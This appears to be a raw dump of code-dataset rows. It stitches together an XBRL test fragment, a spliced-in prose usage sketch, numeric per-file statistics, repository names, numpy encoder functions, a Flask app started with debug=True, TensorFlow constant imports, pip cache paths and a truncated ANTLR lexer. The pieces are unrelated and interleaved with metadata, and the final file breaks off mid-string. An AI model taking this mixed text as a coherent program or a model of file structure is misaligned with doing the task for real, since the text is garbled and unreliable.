    f = report.facts.get("fn1")
    assert f is not None
    assert f.value == " This is the content of footnote 1. "
    assert f.stringValue == " This is the content of footnote 1. "
    assert not f.isNumeric
    assert f.period is None
    assert f.entity is None
    f = report.facts.get("fn2")
    assert f is not None
    assert f.value == "<p>This is the content of footnote 2.</p>\n <p>It has <b>bold</b> and a nested footnote.\n And a nested fact.\n \n </p>\n "
    assert not f.isNumeric
    assert f.period is None
    assert f.entity is None
    f = report.facts.get("fn4")
    assert f is not None
    assert f.value == "It has <b>bold</b> and a nested footnote.\n And a nested fact.\n "
    assert not f.isNumeric
    assert f.period is None
    assert f.entity is None
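A minimal usage sketch of the loader pattern this test exercises, reusing only the calls that appear above (xbrl.XBRLProcessor and loadIXBRLReport from the blinkace/pxp processor); my-report.xhtml is a placeholder input:

import os.path
from urllib.request import pathname2url
import xbrl

processor = xbrl.XBRLProcessor()
url = "file:" + pathname2url(os.path.abspath("my-report.xhtml"))  # placeholder path
report = processor.loadIXBRLReport(url)
for fact_id in ("f1", "f4"):
    f = report.facts.get(fact_id)
    if f is not None:
        print(fact_id, f.isNumeric, f.stringValue)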
| 40.115789
| 162
| 0.661244
| 605
| 3,811
| 4.157025
| 0.175207
| 0.147515
| 0.087873
| 0.03499
| 0.818688
| 0.818688
| 0.766203
| 0.758648
| 0.682704
| 0.682704
| 0
| 0.083416
| 0.207295
| 3,811
| 94
| 163
| 40.542553
| 0.74909
| 0
| 0
| 0.578313
| 0
| 0.048193
| 0.255314
| 0.040934
| 0
| 0
| 0
| 0
| 0.759036
| 1
| 0.012048
| false
| 0
| 0.060241
| 0
| 0.072289
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
795ea58381492dcb86878bcbbda527c0fc22dc9f
| 45
|
py
|
Python
|
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
from .aug_utils import rand_bbox, rand_region
| 45
| 45
| 0.866667
| 8
| 45
| 4.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7978ddeb7051d4fc1d14085fb6db0225c9b21c95
| 37
|
py
|
Python
|
basics/1_print.py
|
hardikid/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | 1
|
2019-11-19T11:42:50.000Z
|
2019-11-19T11:42:50.000Z
|
basics/1_print.py
|
hardikid/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | 5
|
2021-08-23T20:36:02.000Z
|
2022-02-03T13:20:23.000Z
|
basics/1_print.py
|
ihardik/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | null | null | null |
print("This is print from python.")
| 12.333333
| 35
| 0.702703
| 6
| 37
| 4.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 37
| 2
| 36
| 18.5
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
79a34aa7cf6567dca5a9c5fdb417e953061c81f3
| 85
|
py
|
Python
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 48
|
2019-04-12T19:55:34.000Z
|
2022-03-12T06:47:45.000Z
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 60
|
2019-04-22T10:43:46.000Z
|
2021-07-16T15:36:44.000Z
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 13
|
2019-06-28T07:51:36.000Z
|
2020-12-17T16:37:19.000Z
|
from .test_middleware import DelAttrAutounitMiddleware, DelObjectsAutounitMiddleware
| 42.5
| 84
| 0.917647
| 6
| 85
| 12.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 85
| 1
| 85
| 85
| 0.9625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
79b0e14eca9e059406dbc693264e1bf08caea487
| 1,591
|
py
|
Python
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | 1
|
2021-03-30T11:55:42.000Z
|
2021-03-30T11:55:42.000Z
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | 2
|
2020-04-21T21:19:56.000Z
|
2020-09-18T09:39:48.000Z
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | null | null | null |
import numpy as np
def average_encoder(X):
    return sum_encoder(X=X, normalise=True)
def sum_encoder(X, normalise=False):
    if isinstance(X, list):
        X = np.array(X)
    if isinstance(X, np.ndarray):
        if len(X.shape) > 1 and X.shape[0] > 1:
            C = np.sum(X, axis=0) if not normalise else np.average(X, axis=0)
        else:
            C = X.reshape(-1,)
    else:
        C = None
    return C
def max_encoder(X):
    if isinstance(X, list):
        X = np.array(X)
    if isinstance(X, np.ndarray):
        if len(X.shape) > 1 and X.shape[0] > 1:
            C = np.max(X, axis=0)
        else:
            C = X.reshape(-1,)
    else:
        C = None
    return C
def min_encoder(X):
    if isinstance(X, list):
        X = np.array(X)
    if isinstance(X, np.ndarray):
        if len(X.shape) > 1 and X.shape[0] > 1:
            C = np.min(X, axis=0)
        else:
            C = X.reshape(-1,)
    else:
        C = None
    return C
def concatenate_average_max_encoder(X):
    A = average_encoder(X)
    B = max_encoder(X)
    return np.concatenate((A, B))
def concatenate_sum_max_encoder(X):
    A = sum_encoder(X)
    B = max_encoder(X)
    return np.concatenate((A, B))
def concatenate_average_min_encoder(X):
    A = average_encoder(X)
    B = min_encoder(X)
    return np.concatenate((A, B))
def concatenate_sum_min_encoder(X):
    A = sum_encoder(X)
    B = min_encoder(X)
    return np.concatenate((A, B))
def concatenate_min_max_encoder(X):
    A = max_encoder(X)
    B = min_encoder(X)
    return np.concatenate((A, B))
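A quick usage sketch of the encoders above on a small batch of vectors; the output shapes follow directly from the axis=0 reductions:

import numpy as np

X = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])  # three 2-d vectors
print(sum_encoder(X))                       # [ 9. 12.]
print(average_encoder(X))                   # [3. 4.]
print(max_encoder(X))                       # [5. 6.]
print(concatenate_average_max_encoder(X))   # [3. 4. 5. 6.]
print(sum_encoder([[1.0, 2.0]]))            # a single row is flattened to [1. 2.]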
| 18.717647
| 77
| 0.567568
| 250
| 1,591
| 3.492
| 0.136
| 0.183276
| 0.088202
| 0.080183
| 0.776632
| 0.776632
| 0.776632
| 0.712486
| 0.712486
| 0.712486
| 0
| 0.014376
| 0.30044
| 1,591
| 85
| 78
| 18.717647
| 0.769991
| 0
| 0
| 0.732143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160714
| false
| 0
| 0.017857
| 0.017857
| 0.339286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
79d02635e051825abc02fd43db336b8abadad89c
| 35
|
py
|
Python
|
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 1
|
2021-06-10T14:59:13.000Z
|
2021-06-10T14:59:13.000Z
|
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 1
|
2021-04-09T09:44:44.000Z
|
2021-04-09T09:44:44.000Z
|
from . import test_web_dialog_size
| 17.5
| 34
| 0.857143
| 6
| 35
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8dafcba3937efe36996ce1dcc4f8b9a2da8a40d2
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/requests/certs.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/requests/certs.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/requests/certs.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/74/e0/79/ad5d83675ddd121abd0546bfe21779900aa0e7d7bfcd4641d347da633f
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 0
| 96
| 1
| 96
| 96
| 0.489583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8dc919e8eb7168ee99c28c02679e3685903b6311
| 917
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Constants for SavedModel save and restore operations.
"""
from __future__ import print_function
from tensorflow.python.saved_model.constants import ASSETS_DIRECTORY
from tensorflow.python.saved_model.constants import ASSETS_KEY
from tensorflow.python.saved_model.constants import LEGACY_INIT_OP_KEY
from tensorflow.python.saved_model.constants import MAIN_OP_KEY
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PB
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PBTXT
from tensorflow.python.saved_model.constants import SAVED_MODEL_SCHEMA_VERSION
from tensorflow.python.saved_model.constants import VARIABLES_DIRECTORY
from tensorflow.python.saved_model.constants import VARIABLES_FILENAME
del print_function
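These re-exported constants are conventionally used to locate the pieces of an exported SavedModel on disk. A sketch, importing from the same underlying module this generated file does; export_dir is a hypothetical path, and the quoted values are the conventional ones rather than guaranteed by this file:

import os
from tensorflow.python.saved_model.constants import (
    SAVED_MODEL_FILENAME_PB,  # conventionally "saved_model.pb"
    VARIABLES_DIRECTORY,      # conventionally "variables"
)

export_dir = "/tmp/my_model"  # hypothetical export location
print(os.path.join(export_dir, SAVED_MODEL_FILENAME_PB))
print(os.path.join(export_dir, VARIABLES_DIRECTORY))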
| 43.666667
| 83
| 0.852781
| 125
| 917
| 5.976
| 0.36
| 0.160643
| 0.240964
| 0.301205
| 0.685408
| 0.685408
| 0.685408
| 0.685408
| 0.31593
| 0.168675
| 0
| 0
| 0.097056
| 917
| 20
| 84
| 45.85
| 0.902174
| 0.196292
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.909091
| 0
| 0.909091
| 0.181818
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5c16f291962df1e24499d107592769c2b09f4f8a
| 165
|
py
|
Python
|
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
from .model_test import TestModelClass
from .request import *
from .datatype import *
from .response import *
from .reconstructor import *
from .decorators import *
| 23.571429
| 38
| 0.787879
| 20
| 165
| 6.45
| 0.5
| 0.310078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 165
| 6
| 39
| 27.5
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
309aa91528f9711ccaa1043dfc1118339588ad15
| 189
|
py
|
Python
|
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | 1
|
2019-12-06T22:33:12.000Z
|
2019-12-06T22:33:12.000Z
|
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | null | null | null |
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | null | null | null |
from project import app
from flask import render_template
@app.route('/')
def index():
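    # Portuguese, roughly: "Main page of the backend. You should not be here."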
return "<h1>Página principal do backend. Você não deveria estar aqui.</h1>"
app.run(debug=True)
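A sketch of exercising the route without a live server, via Flask's built-in test client (assuming, as above, that the project package exposes a standard Flask app):

from project import app

with app.test_client() as client:
    resp = client.get("/")
    print(resp.status_code)           # 200
    print(resp.data.decode("utf-8"))  # the <h1>...</h1> body returned by index()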
| 21
| 79
| 0.730159
| 29
| 189
| 4.724138
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 0.148148
| 189
| 9
| 80
| 21
| 0.838509
| 0
| 0
| 0
| 0
| 0
| 0.352632
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a5132f795558e3729a319239d9cd8307505f5e6f
| 25,877
|
py
|
Python
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 2
|
2020-05-08T20:02:22.000Z
|
2020-08-25T11:55:10.000Z
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 2
|
2016-11-28T01:43:53.000Z
|
2020-05-18T19:53:15.000Z
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 5
|
2016-11-19T02:18:58.000Z
|
2020-12-16T09:56:13.000Z
|
# Generated from PLambda.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2D")
buf.write("\u026a\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\3\2\3\2\3\3\3\3\3\4\3\4\5\4")
buf.write("\u0096\n\4\3\5\3\5\3\5\5\5\u009b\n\5\3\6\3\6\3\6\3\6\3")
buf.write("\6\3\6\3\6\3\6\3\6\3\6\3\6\5\6\u00a8\n\6\3\7\3\7\3\7\3")
buf.write("\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\5\7\u00b9")
buf.write("\n\7\3\b\3\b\3\b\3\b\3\b\5\b\u00c0\n\b\3\t\3\t\3\t\3\t")
buf.write("\3\t\3\t\5\t\u00c8\n\t\3\n\3\n\3\13\3\13\5\13\u00ce\n")
buf.write("\13\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\16\3\16\3\16")
buf.write("\3\17\3\17\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\24\3\24")
buf.write("\3\24\3\24\3\24\3\24\3\24\3\24\3\25\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\26\3\26\3\27\3\27\3\27\3\27\3\27\3\27\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\31")
buf.write("\3\31\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3\33\3\33\3\34")
buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\35")
buf.write("\3\35\3\35\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36")
buf.write("\3\37\3\37\3\37\3\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3 \3")
buf.write(" \3!\3!\3!\3!\3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3\"\3#")
buf.write("\3#\3#\3#\3$\3$\3$\3$\3$\3$\3%\3%\3%\3%\3%\3%\3&\3&\3")
buf.write("&\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'")
buf.write("\3\'\3(\3(\3(\3(\3)\3)\3)\3*\3*\3*\3+\3+\3+\3+\3+\3+\3")
buf.write("+\3,\3,\3,\3,\3,\3,\3,\3-\3-\3-\3-\3-\3-\3-\3-\3.\3.\3")
buf.write(".\3.\3.\3.\3.\3/\3/\3/\3/\3/\3/\3/\3\60\3\60\3\60\3\60")
buf.write("\3\60\3\60\3\60\3\60\3\61\3\61\3\61\3\61\3\61\3\61\3\61")
buf.write("\3\61\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63\3\63")
buf.write("\3\63\3\64\3\64\3\64\3\65\3\65\3\65\3\65\3\65\3\65\3\65")
buf.write("\3\65\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\67\3\67\3\67")
buf.write("\3\67\3\67\3\67\3\67\38\38\39\39\39\3:\3:\3:\3:\3:\3:")
buf.write("\3:\3:\3;\3;\3;\5;\u01ef\n;\3;\3;\3;\7;\u01f4\n;\f;\16")
buf.write(";\u01f7\13;\3<\5<\u01fa\n<\3<\3<\6<\u01fe\n<\r<\16<\u01ff")
buf.write("\3<\6<\u0203\n<\r<\16<\u0204\3<\3<\7<\u0209\n<\f<\16<")
buf.write("\u020c\13<\5<\u020e\n<\5<\u0210\n<\3=\3=\3>\3>\3>\7>\u0217")
buf.write("\n>\f>\16>\u021a\13>\3>\3>\3?\3?\3?\3?\5?\u0222\n?\3@")
buf.write("\3@\3@\7@\u0227\n@\f@\16@\u022a\13@\3@\3@\3A\3A\3A\3A")
buf.write("\5A\u0232\nA\3B\3B\3C\3C\3D\3D\7D\u023a\nD\fD\16D\u023d")
buf.write("\13D\3D\5D\u0240\nD\3D\3D\3D\3D\3E\3E\3E\3E\7E\u024a\n")
buf.write("E\fE\16E\u024d\13E\3E\5E\u0250\nE\3E\3E\3E\3E\3F\3F\3")
buf.write("F\3F\7F\u025a\nF\fF\16F\u025d\13F\3F\3F\3F\3F\3F\3G\6")
buf.write("G\u0265\nG\rG\16G\u0266\3G\3G\7\u0218\u0228\u023b\u024b")
buf.write("\u025b\2H\3\3\5\4\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25")
buf.write("\f\27\r\31\16\33\17\35\20\37\21!\22#\23%\24\'\25)\26+")
buf.write("\27-\30/\31\61\32\63\33\65\34\67\359\36;\37= ?!A\"C#E")
buf.write("$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62c\63e\64g\65i\66k")
buf.write("\67m8o9q:s;u<w=y\2{>}\2\177?\u0081\2\u0083\2\u0085@\u0087")
buf.write("A\u0089B\u008bC\u008dD\3\2\37\7\2\'\',-\61\61>>@@\4\2")
buf.write("UUuu\4\2GGgg\4\2SSss\4\2FFff\4\2QQqq\4\2NNnn\4\2VVvv\4")
buf.write("\2HHhh\4\2KKkk\4\2PPpp\4\2CCcc\4\2OOoo\4\2DDdd\4\2RRr")
buf.write("r\4\2[[{{\4\2XXxx\4\2MMmm\4\2TTtt\4\2EEee\4\2JJjj\4\2")
buf.write("LLll\4\2IIii\4\2WWww\4\2YYyy\3\2\62;\6\2C\\aac|\u0082")
buf.write("\u0101\f\2##%&((,,/\61<=AB]]_a}\u0080\5\2\13\f\17\17\"")
buf.write("\"\2\u029d\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2")
buf.write("\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2")
buf.write("\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2")
buf.write("\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#")
buf.write("\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2")
buf.write("\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65")
buf.write("\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2")
buf.write("\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2")
buf.write("\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2")
buf.write("\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3")
buf.write("\2\2\2\2]\3\2\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e")
buf.write("\3\2\2\2\2g\3\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2")
buf.write("o\3\2\2\2\2q\3\2\2\2\2s\3\2\2\2\2u\3\2\2\2\2w\3\2\2\2")
buf.write("\2{\3\2\2\2\2\177\3\2\2\2\2\u0085\3\2\2\2\2\u0087\3\2")
buf.write("\2\2\2\u0089\3\2\2\2\2\u008b\3\2\2\2\2\u008d\3\2\2\2\3")
buf.write("\u008f\3\2\2\2\5\u0091\3\2\2\2\7\u0095\3\2\2\2\t\u009a")
buf.write("\3\2\2\2\13\u00a7\3\2\2\2\r\u00b8\3\2\2\2\17\u00bf\3\2")
buf.write("\2\2\21\u00c7\3\2\2\2\23\u00c9\3\2\2\2\25\u00cd\3\2\2")
buf.write("\2\27\u00cf\3\2\2\2\31\u00d4\3\2\2\2\33\u00d8\3\2\2\2")
buf.write("\35\u00db\3\2\2\2\37\u00df\3\2\2\2!\u00e6\3\2\2\2#\u00ed")
buf.write("\3\2\2\2%\u00f3\3\2\2\2\'\u00fa\3\2\2\2)\u0102\3\2\2\2")
buf.write("+\u0106\3\2\2\2-\u010a\3\2\2\2/\u0110\3\2\2\2\61\u0118")
buf.write("\3\2\2\2\63\u011e\3\2\2\2\65\u0122\3\2\2\2\67\u0127\3")
buf.write("\2\2\29\u012e\3\2\2\2;\u0135\3\2\2\2=\u013e\3\2\2\2?\u0144")
buf.write("\3\2\2\2A\u014c\3\2\2\2C\u0153\3\2\2\2E\u015a\3\2\2\2")
buf.write("G\u015e\3\2\2\2I\u0164\3\2\2\2K\u016a\3\2\2\2M\u0171\3")
buf.write("\2\2\2O\u017c\3\2\2\2Q\u0180\3\2\2\2S\u0183\3\2\2\2U\u0186")
buf.write("\3\2\2\2W\u018d\3\2\2\2Y\u0194\3\2\2\2[\u019c\3\2\2\2")
